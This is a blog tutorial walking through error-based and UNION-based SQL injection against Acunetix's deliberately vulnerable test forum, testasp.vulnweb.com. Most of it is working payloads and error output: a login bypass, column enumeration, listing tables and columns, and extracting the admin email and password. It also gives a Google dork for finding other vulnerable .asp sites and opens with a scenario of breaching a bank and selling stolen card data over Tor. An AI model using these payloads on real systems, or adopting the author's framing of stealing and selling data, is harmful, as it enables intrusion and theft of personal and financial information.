Sneaker's Stub - The Grey Stuff!

SQL Injection Part 2

In this article we will be looking at SQL Injection and how we can exploit different types of SQL vulnerabilities present on a website.SQL Injection is one most dangerous ways to get into some site and ruin it totally! Database contains every precious information. It consist of records of credit cards, names with address or personal information and if such a database gets into wrong hands then that might be the biggest problem.64094720

Let me tell you a scenario of how a malicious hacker can exploit this very dangerous vulnerability and get into your database, Now let’s just say I’m surfing a banking website and found login or any URL based injection vulnerability on that banking website, Firstly, I would look for the database type and I would inject malicious queries on that site, Soon after getting admin or root password, and I could even get a list of credit cards numbers and their holder’s name and other personal and confidential information. But then again if I would it I could get in trouble? Okay then I could use tor network, selling that information to someone else at a nice price so I could get away.

Things like that actually happen and nobody could do anything about that!

In SQL Injection part 1 , I gave a really basic idea of how you can actually find out that the website you’re dealing with have SQL vulnerability. Now I’m going to tell you how you can query the database for a particular request.Firstly we will look at error based scenario so you would know what does it look like. I Choose a .asp website, but you can choose any site that you want, What’s more important is “You should know the certain queries in that Database language”. You can randomly select a site by google database hacking technique but then don’t be a fool to pick on some website without a reason. (inurl:”.asp?id=”). you can add php and aspx in the place of asp.

Lets Do this now.

I  am using acunetix simulator. They have provided a testing forum at http://testasp.vulnweb.com/, you can go on and test your skills on that forum.

1

Once we enter the website, we will take a look at the parameters where we can inject the code –> the search, the login and the URL!So let’s open the login page and insert a simple always true query (‘or’a’=’a) in the username and password fields. And you will see that we are logged in.2 34

After logging in lets check the forum threads, once you click on any of these forums URL changes. the “id” in the url takes  parameter to operate and we can inject the code here!5

Adding Single quote (‘) at the end of the parameter to check whether the given website filters unwanted characters or not. 6This gives us the error stating

“Microsoft SQL Native Client error ‘80040e14’

Unclosed quotation mark after the character string ”.

/showforum.asp, line 9″ . 

 

This single quote closes/terminates the parameterized queries stored in the databases.Once we add another single quote, an unfiltered environment will give an error.

The next step will be finding the number of columns present the database that we are viewing right now. So To do this we will be using order by clause!

http://testasp.vulnweb.com/showforum.asp?id=0 order by 1 —

(–) The dashes are used to comment out the further query sql adds after order by 1, this way only order by 1 query will be executed. They are different for different databases.*/ and ;  are also used to comment out further queries.

Now you have to use order by and increment until you get the an error like “unknown column ” or “column number doesn’t exist”. I got this error after incrementing the column to 3. So 3rd column doesn’t exist so that means we’ve got 2 columns here!7

“Microsoft SQL Native Client error ‘80040e14’

The ORDER BY position number 3 is out of range of the number of items in the select list.

/showforum.asp, line 9″

Now we have to check if the union query works or not! The union query combines two queries in order to give a single result. So we will be using union all select query to find the vulnerable columns. Now the question arises that what exactly make that column vulnerable and how would you exactly know that it is vulnerable?

“The answer to this is while we write a query, the data type we are using is a String. In a Database,different columns have different data-types. But the thing you should know is, you can’t write your query in a column taking only integer values. So we have to find a column which is using String as the datatype so that we can further query the database.” 14 12

There are numerous ways in which union would work, here are some ways–>

After finding the number of columns in the query is 2 we use:

http://testasp.vulnweb.com/showforum.asp?id=null union all select 1,2–

8

This query will result in 1 printed on the screen telling us that 1 have the datatype that we require in order to query the database.

We can also use other forms of union to find this:

http://testasp.vulnweb.com/showforum.asp?id=-1 union all select 1,2–

http://testasp.vulnweb.com/showforum.asp?id=-1 union all select null,2–

http://testasp.vulnweb.com/showforum.asp?id=null union all select 1,null–

http://testasp.vulnweb.com/showforum.asp?id=1 union all select 1,null–

( this query is not working with this test site because its taking column 1’s value as the prior value and displaying it ).

So now we got vulnerable column and we ready to take this to next level!

now lets find the database name we use following query:

http://testasp.vulnweb.com/showforum.asp?id=null union all select db_name(),2–

9

Find Version of the database:

http://testasp.vulnweb.com/showforum.asp?id=null union all select @@version,2–

10

Find databases and listing them:

http://testasp.vulnweb.com/showforum.asp?id=null union all select schema_name,2 from information_schema.schemata–

Find table names:

http://testasp.vulnweb.com/showforum.asp?id=-1 UNION SELECT table_name,2 FROM information_schema.tables–

We want a table name with users on it, So I am going to use LIKE clause just to find if there’s a table name exist with that name or not

http://testasp.vulnweb.com/showforum.asp?id=null union all select column_name,2 from information_schema.columns where table_name LIKE ‘%users%’ —

I tried ‘%user%’, it gave me an error so I searched for users, it gave me a hint that this table does exist!

There is another way to do this by using NOT IN clause

http://testasp.vulnweb.com/showforum.asp?id=null+UNION+SELECT+table_name,2+FROM+information_schema.tables+WHERE+table_name+NOT+IN+(‘forums’)–

The above query result would be “posts” and this is not what we are looking for so we are going to collect these table name and then apply NOT IN clause to find out the table which is not shown!

http://testasp.vulnweb.com/showforum.asp?id=-1+UNION+SELECT+table_name,2+FROM+information_schema.tables+WHERE+table_name+NOT+IN+(‘forums’,’threads’,’posts’)–     This query resulted in users table!

11

So Now we know about the table “users”. We need to know the column names of users to get further more information. So we will be using  NOT IN again in order to find that.

http://testasp.vulnweb.com/showforum.asp?id=null UNION SELECT column_name,2 FROM information_schema.columns WHERE table_name=’users’–

this query gave us avatar as a column name now we can apply NOT IN to find further more column names.

http://testasp.vulnweb.com/showforum.asp?id=-1+UNION+SELECT%20column_name,2%20FROM%20information_schema.columns%20where%20column_name%20NOT%20IN%20(‘avatar’,’descr’,’email’,’forumid’,’id’,’message’,’name’,’postdate’,’poster’,’realname’,’SSMA_TimeStamp’,’threadid’,’title’,’uname’)–

This query will give upass field which we are interested in!

We know that the admin user exist because forum have posts which are return by admin. Now we can find out the email, message,desc,realname and upass for the admin!

http://testasp.vulnweb.com/showforum.asp?id=-1+UNION+SELECT+email,2+FROM+users+where+uname=’admin’–

13

This query will give us the password for admin:

http://testasp.vulnweb.com/showforum.asp?id=-1+UNION+SELECT upass,2 FROM users where uname=’admin’–

The password for admin is “none”!!

This is how you carry out Error based SQL injection on a website. The thing is you should have knowledge about what you are doing. And I must say that this is not a real good thing to do unless you are going to tell the administrator about the vulnerability on their site.

We will look for blind injections later!

Stay Anonymous! :)

Ciao!



Leave a Reply